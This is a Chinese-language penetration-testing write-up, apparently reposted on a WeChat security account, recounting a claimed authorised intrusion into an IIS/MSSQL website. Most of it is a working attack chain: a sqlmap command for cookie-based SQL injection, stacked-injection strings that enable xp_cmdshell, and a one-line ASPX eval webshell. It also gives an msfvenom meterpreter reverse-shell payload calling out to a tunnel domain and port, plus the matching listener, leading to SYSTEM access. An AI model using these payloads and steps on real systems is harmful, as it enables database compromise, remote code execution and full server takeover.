本文仅用于技术讨论与学习，利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，文章作者及本公众号不为此承担任何责任。

前言

　　最近刚好闲来无事，打开微信接到要一个对网站进行渗透测试的消息，对方发来网站后，马不停蹄的开始。**(本次渗透过程均在目标授权下进行，请勿进行非法渗透行为)**

信息收集

　　打开网站，一股简陋破败风引面而来，随即注册一个账号，以便后面的登录 　　

　　利用wappalyzer浏览器插件，获取到的信息，对于我这个菜鸡而言，并没有看到可以有用的东西 　　

　　得到waf为OWASP CRS 　　

　　使用nmap扫描，nmap -O -v -Pn 61.157.xx.xx 　　

　　开放的端口少之又少，基本没啥可利用的。又结合web服务器是iis，再根据nmap猜测的操作系统，确定操作系统为win server 2012 　　再用nmap自带的漏洞利用脚本，nmap –script=vuln 61.157.xx.xx 　　

　　主机安全做的很好，数据库禁止外连，让我无从下手，只有换一条路 　　

　　直接上御剑后，看到admin字符，让我心中小喜，果断打开 　　

　　尝试弱口令登陆 　　

　　神奇的一幕出现了，竟然验证码有误? 　　

　　后来不管我怎么输入，都只会出现一个提示”验证码有误!”，看来对方的设计是大家来一个同归于尽，这条路只好放弃了 　　

漏洞挖掘

　　登陆进去后，发现有上传头像的地方，果断试试能不能上传马 　　尝试content-type能否绕过 　　

　　看来对方是要校验后缀名，而且还是白名单的形式，看是否有iis解析漏洞，期间我搜了许多都没有找到iis8.5漏洞文章 　　

　　上传一次正常图片后，虽然给出图片路径，但文件名是根据时间戳命名的图片，并且统一后缀名为png，这种看到就换条路吧 　　

　　看到重置登陆密码，我就猜想这个框是否存在sql注入呢 　　

　　难道就这样放弃了吗，我停下手中的键盘想了想。无论我怎么修改密码字符，都提示密码错误，那么肯定是将cookie中(shouji)参数代入sql语句，然后在将密码参数代入，看两个参数是否同时匹配数据库。也就是说shouji参数也可能存在sql注入 　　

　　这都不拦截？形同虚设的waf 　　 　　

　　 　　直接上sqlmap，以前从来没有碰到过注入点在cookie里面的，所以sqlmap命令格式就卡了我一天。顺便总结一下如果注入点在cookie，并且网站需要登录的命令。　　带上–cookie参数，作用是让sqlmap能登陆进网站，重点来了，必须使用–level 2 后面的数字必须是>=2，它才会检测cookie是否存在注入点 　　参考命令如下

python sqlmap.py -u "http://xxxx/tedb/user_repwd.aspx" --level 2 --cookie="member=id=45230&shouji=123456" -p member --random-agent

　　添加–os-shell参数，看能否直接得到shell 　　

　　报错信息意思是不支持堆叠注入，这里有疑惑点后面讲 　　获取banner信息为Microsoft SQL Server 2008，操作系统win server 2012 or 2008，根据前面的信息 100%确定操作系统为win server 2012 　　

　　获取数据库 　　

　　获取msdb数据库中的表，出现了这一幕 　　

　　此时天色已晚，躺在床上的我，整理一下思路。首先能获取到数据库信息，那么肯定存在sql注入的，其次是mssql数据库，是不是还有其他办法得到webshell呢？于是打开手机疯狂百度，学习其他大佬的姿势，找到了可以用xp_cmdshell 来让对方服务器远程执行cmd命令。学到了，明天起来验证，睡觉狗命要紧!!!

利用xp_cmdshell拿到webshell

　　MSSQL2005及以上版本默认禁用了xp_cmdshell。而如果该扩展存储过程没被删除，就能一句话启用它(不支持多句执行的话，请单独执行每句)

--开启
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE
--关闭
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 0;RECONFIGURE

exec master..xp_cmdshell "whoami" --用来执行cmd命令

　　能远程执行命令，很nice，果断开启 　　

　　因图片看不清有些标点符号，贴出完整语句

shouji=123456';EXEC sp_configure 'show advanced options',1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE--

　　可以从图片清楚的看到出现了红色和黑色两部分，这说明黑色部分的语句并没有发送过去，只有红色的部分发送过去了，这也是burp很强大的功能。　　将 ‘;’ url编码成 %3b，其他发送失败的字符也同理(还记得前面写的不支持堆叠注入吗，原因就在于sqlmap中的payload没有将’;’转换成%3b，所以会出现不支持堆叠注入，自己编写一个sqlmap的tamper脚本即可sqlmap tamper脚本编写) 　　

　　执行后，是无法得知对方是否成功开启了xp_cmdshell，所以可以用ping命令返回时间，来判断 　　发送后，大约等了10s左右，得到了响应包，说明开启成功 　　

　　先查看一下是什么权限吧 　　

　　竟然无回显，查阅后得知，可以将结果写入表中，然后查看表中的内容即可

drop TABLE D99_CMD; create TABLE D99_CMD([Data][varchar](1000),ID int NOT NULL IDENTITY (1,1));insert D99_CMD exec master.dbo.xp_cmdshell 'whoami' ;

　　将执行的结果写进D99_CMD表 　　

　　改变id=1后面的数字即可查看表中对应的行的内容，只能一行一行的查看，这也是非常鸡肋的地方

-- 查看表中的内容
And (select Top 1 char(124) data char(124) From (select Top 1 [ID],[Data] From D99_CMD where id=1 Order by [ID]) T Order by [ID] desc)>0
-- 获取表有多少行
And (select char(124)%2Bcast(Count(1) as varchar(8000))%2Bchar(124) From D99_CMD)>0

　　注意这里的system权限，是对方cmd.exe拥有的system权限，即本地cmd执行whoami，返回的内容 　　查看对方有哪些盘

for %i in (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) do @if exist %i: echo %i:

　　执行命令后，查看表中的内容，如果出现”此时不应有 i。”，将payload进行url编码，重新发送后即可 　　

　　获取到对方有c,d盘 　　

　　接下来，就要获取网站的物理路径 　　

#在c盘下查找user_repwd.aspx文件的物理路径 注意文件名后面一定要有'*'号
for /r c: %i in (user_repwd*.aspx) do @echo %i 

　　当我查看表中的内容时，无任何回显于是，在d盘下搜索，得到 　　

　　其实在我最开始的时候，我没有先执行获取对方有哪些盘符的命令，而是先执行c盘下获取文件路径命令。当输出表结果是无任何回显时，我是非常懵逼的，我一度怀疑命令是不是执行失败，而没有第一次时间考虑到对方有多个盘符，导致我在这里浪费了几个小时。。

#将一句话木马写入文件
echo ^<%@ Page Language="Jscript"%^>^<%eval(Request.Item["pass"],"unsafe");%^> > d:wwwrootsjktedbshell.aspx

　　使用蚁剑成功连接上webshell 　　

　　执行whoami后发现是iis apppoolxxx 　　发现拥有的权限有，可遍历文件夹包括c盘，文件读写，当前文件夹下不能上传文件 　　很幸运的是，我发现在其他文件夹下能成功上传文件，接下来提权

提权

　　这里我用花生壳来建立tcp隧道 　　打开kali，查看ip地址 　　

　　点击花生壳最右下角的’+’号，创建场景，应用名称随便填，内网主机填kali的ip地址，内网端口随便填，我这里填8080，保存 　　

　　生成反弹shell

msfvenom -a x64 --platform Windows -p windows/x64/meterpreter/reverse_tcp  LHOST=外网域名 LPORT=外网端口 -f exe -o install.exe

以我的为例，生成反弹shell参考命令如下

msfvenom -a x64 --platform Windows -p windows/x64/meterpreter/reverse_tcp  LHOST=l347x45481.qicp.vip LPORT=57945 -f exe -o install.exe

　　生成的木马将会在当前目录下 　　

　　将kali中的install.exe拖到windows中后，成功上传 　　

　　回到kali中，依次输入以下命令

msfconsole
use exploit/multi/handler  
set payload windows/x64/meterpreter/reverse_tcp  
set lhost 192.168.46.129     //内网主机ip
set lport 8080               //内网端口
run

　　成功开启监听 　　

　　接下来就是运行木马了，这里要注意的是，什么样的权限，无论运行什么程序它赋予的权限也是一样的。如果我直接在蚁剑中执行马子，那么此马子的权限还是iis，而前面通过xp_cmdshell得知权限为system，所以还是要用xp_cmdshell来执行马子 　　

　　session成功建立，如果不成功，有可能是防火墙，杀软在捣乱，谁叫我人品好呢。要是对方安装个杀软，我还要搞免杀，也不至于这么顺利 　　

提权成功 　　

剩下的就是后渗透阶段了，永久后门植入，权限维持，域渗透等等。

文章来源：https://maidang.cool/2020/45983.html

致力于红蓝对抗，实战攻防，星球不定时更新内外网攻防渗透技巧，以及最新学习研究成果等。常态化更新最新安全动态。专题更新奇技淫巧小Tips及实战案例。

涉及方向包括Web渗透、免杀绕过、内网攻防、代码审计、应急响应、云安全。星球中已发布 510+ 安全‍资源，不定时分享未公开或者小范围公开的漏洞，针对网络安全成员的普遍水平，并为星友提供了教程、工具、POC&EXP以及各种学习笔记等等。(点我了解详情)

‍

关注公众号回复“加群”，添加Z2OBot好友，自动拉你加入Z2O安全攻防交流群(微信群)分享更多好东西。（QQ群可直接扫码添加）

关注福利：

回复“app" 获取  app渗透和app抓包教程

回复“渗透字典" 获取 针对一些字典重新划分处理，收集了几个密码管理字典生成器用来扩展更多字典的仓库。

回复“书籍" 获取 网络安全相关经典书籍电子版pdf

回复“资料" 获取 网络安全、渗透测试相关资料文档